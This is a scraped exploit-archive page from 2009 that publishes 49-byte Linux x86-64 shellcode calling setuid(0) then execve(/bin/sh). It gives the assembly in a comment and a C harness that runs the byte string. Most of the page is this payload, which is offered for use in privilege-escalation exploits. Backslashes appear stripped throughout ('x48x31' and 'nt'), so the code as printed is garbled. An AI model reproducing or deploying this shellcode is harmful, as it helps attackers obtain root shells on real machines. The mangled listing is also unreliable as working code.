linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes
# Published : 2009-05-14
# Author : evil.xi4oyu
# Previous Title : freebsd/x86-64 execve /bin/sh shellcode 34 bytes
# Next Title : Serial port shell binding, busybox Launching shellcode

/*
setuid(0) + execve(/bin/sh) - just 4 fun. 
xi4oyu [at] 80sec.com
 
main(){
__asm(  "xorq %rdi,%rdint"
        "mov $0x69,%alnt"
        "syscall nt"
        "xorq   %rdx, %rdx nt"
        "movq   $0x68732f6e69622fff,%rbx; nt"
        "shr    $0x8, %rbx; nt"
        "push   %rbx; nt"
        "movq   %rsp,%rdi; nt"
        "xorq   %rax,%rax; nt"
        "pushq  %rax; nt"
        "pushq  %rdi; nt"
        "movq   %rsp,%rsi; nt"
        "mov    $0x3b,%al; nt"
        "syscall ; nt"
        "pushq  $0x1 ; nt"
        "pop    %rdi ; nt"
        "pushq  $0x3c ; nt"
        "pop    %rax ; nt"
        "syscall  ; nt"
);
}
*/
main() {
        char shellcode[] =
        "x48x31xffxb0x69x0fx05x48x31xd2x48xbbxffx2fx62"
        "x69x6ex2fx73x68x48xc1xebx08x53x48x89xe7x48x31"
        "xc0x50x57x48x89xe6xb0x3bx0fx05x6ax01x5fx6ax3c"
        "x58x0fx05";
        (*(void (*)()) shellcode)();
}
 
2009-05-14
evil.xi4oyu 

// www.Syue.com [2009-05-14]